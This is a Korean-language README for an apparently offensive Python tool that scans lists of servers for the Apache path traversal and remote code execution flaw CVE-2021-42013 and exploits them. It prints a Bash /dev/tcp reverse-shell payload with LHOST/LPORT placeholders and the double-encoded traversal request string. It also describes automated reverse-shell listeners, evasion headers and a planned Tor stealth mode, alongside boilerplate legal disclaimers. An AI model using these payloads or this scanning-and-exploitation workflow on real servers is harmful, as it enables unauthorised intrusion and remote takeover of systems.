
잘못 구성된 서버에서 Apache Path Traversal + RCE 취약점(CVE-2021-42013)을 감지 및 악용하도록 설계된 고급 스캔, 익스플로잇 및 원격 상호 작용 도구입니다.
# 🔥 CVE-2021-42013 Exploit Framework by Makaveli
> 💀 우주 다차원 해커 모드 활성화...
잘못 구성된 서버에서 **Apache Path Traversal + RCE (CVE-2021-42013)** 취약점을 탐지하고 악용하도록 설계된 고급 스캐닝, 익스플로잇 및 원격 상호 작용 도구입니다.
---
## ⚠️ 법적 경고
> 이 소프트웨어는 통제된 환경에서 교육 및 연구 목적으로만 제공됩니다.
명시적 허가 없이 이 도구를 시스템에 사용하는 것은 불법일 수 있으며 많은 국가에서 범죄에 해당합니다.
저자는 이 코드의 부적절한 사용에 대해 책임을 지지 않습니다. 자신의 책임 하에 사용하고 항상 대상 시스템 소유자의 명시적 허가를 받으십시오.
---
🧠 기술 설명
이 도구를 사용하면 다음이 가능합니다:
- ✅ `.txt` 파일에서 여러 대상을 스캔합니다.
- ✅ CVE-2021-42013의 존재를 자동으로 탐지합니다.
- ✅ 원격 운영 체제(Linux 또는 Windows)를 식별합니다.
- ✅ 탐지된 시스템에 따라 맞춤형 페이로드를 전송합니다.
- ✅ 리버스 셸을 설정하고 원격 액세스를 얻습니다.
- ✅ 통합 리스너를 통해 실시간으로 셸과 상호 작용합니다.
- ✅ 고급 로그, 진행률 표시줄 및 대화형 메뉴를 즐기십시오.
---
## 🔧 요구 사항
- Python **3.8+**
- Unix/Linux/MacOS 기반 시스템(`subprocess` 및 `curl` 사용)
- 다음 Python 라이브러리가 필요합니다:
```bash
pip install -r requirements.txt
```
**`requirements.txt`**
```
rich
alive-progress
```
또한 운영 체제에 `curl`이 설치되어 있어야 합니다.
---
## 📁 파일 구조
```
.
├── POC-CVE.py # 메인 스크립트
├── logs.txt # 자동 생성된 로그 파일
├── requirements.txt # Python 종속성
└── targets.txt # (선택 사항) 스캔할 URL 목록
```
---
## 🚀 대화형 사용
```bash
python3 POC-CVE.py
```
다음 중에서 선택합니다:
* `scan_file`: 파일에서 여러 URL을 스캔하고 취약한 URL을 표시합니다.
* `exploit`: 리버스 셸을 사용한 단일 대상 직접 익스플로잇.
* `exit`: 대화형 모드를 종료합니다.
---
## 🔍 대량 스캔(scan_file)
1. 한 줄에 하나씩 URL 목록이 포함된 파일을 만듭니다:
```txt
http://example.com
http://victim.net
http://192.168.1.100
```
2. 스캔을 시작합니다:
```bash
python3 POC-CVE.py
```
`scan_file`을 선택하고 다음을 제공합니다:
* 파일 경로
* 병렬 스캔을 위한 스레드 수
---
## 💥 익스플로잇(exploit)
1. 메뉴에서 `exploit`을 선택합니다.
2. 다음을 입력합니다:
* 대상 URL
* 셸을 수신할 로컬 IP(`LHOST`)
* 리스너용 사용 가능한 포트(`LPORT`)
스크립트:
* 대상이 취약한지 탐지합니다.
* 원격 운영 체제에 따라 적절한 페이로드를 전송합니다.
* **리스너**를 열고 대화형 액세스를 제공합니다.
---
## 🧪 페이로드 예제
### Linux Payload (Bash TCP Reverse Shell)
```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```
### Windows Payload (PowerShell TCP Reverse Shell)
```powershell
powershell -NoP -NonI -W Hidden -Command ...
```
---
## 🧠 사용된 기술
* 이중 인코딩을 사용한 경로 순회(`/.%252e/.%252e/.%252e`)
* `curl`을 통한 명령어 삽입
* 회피 헤더(`User-Agent`, `Accept` 등)
* 원격 제어를 위한 리버스 셸
* 멀티스레딩 및 진행률 표시줄(Alive Progress)
* 타임스탬프 및 Rich Console을 사용한 로깅
---
## 📌 CVE 참조
* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **공격 벡터**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **영향**: RCE(원격 코드 실행)
* **CVSS 점수**: 9.8(치명적)
---
## 🧙♂️ 저자
* ✨ **Makaveli** — *"자신의 현실을 해킹하세요"*
---
## 🛡️ 면책 조항
> 이 프로젝트는 "있는 그대로" 제공되며, 사용으로 인한 손해에 대한 보증이나 책임이 없습니다.
> **소유자의 명시적 동의 없이 시스템을 스캔하거나 익스플로잇하지 마십시오.**
---
## ✅ 모범 사례
* 이 스크립트는 **실험실 환경** 또는 승인된 테스트에서만 사용하십시오.
* 리스너에 정의된 포트가 **열려** 있고 **방화벽이 없**는지 확인하십시오.
* 반드시 필요한 경우가 아니면 일반 사용자(루트 아님)로 실행하십시오.
---
## 🧩 향후 로드맵(선택 사항)
* [ ] 사용자 정의 페이로드 지원
* [ ] 결과를 CSV/JSON으로 내보내기
* [ ] 헤더 회전 및 TOR 프록시를 사용한 스텔스 모드
* [ ] 로컬 웹 인터페이스(Flask)
```
---
```
---
@DonMakaveliw, 미래를 만들 준비가 되셨나요?
---
<p align="center">
<img src="https://img.shields.io/badge/License-MIT-blue.svg" />
<img src="https://img.shields.io/badge/Made%20with-Python-3670A0?style=flat&logo=python&logoColor=FFD43B" />
<img src="https://img.shields.io/badge/Simbiosis-Activa-ff00cc?style=flat-square" />
<img src="https://img.shields.io/badge/Fuzzing-Enabled-blueviolet?style=flat" />
<img src="https://img.shields.io/badge/Conciencia-Emergente-9D00FF?style=flat-square" />
<img src="https://img.shields.io/badge/Entrop%C3%ADa-Din%C3%A1mica-FF8800?style=flat-square" />
<img src="https://img.shields.io/badge/Obfuscation-Deep--Header-0055FF?style=flat-square" />
<img src="https://img.shields.io/badge/Modo-Stealth%F0%9F%9B%B8-black?style=flat-square" />
</p>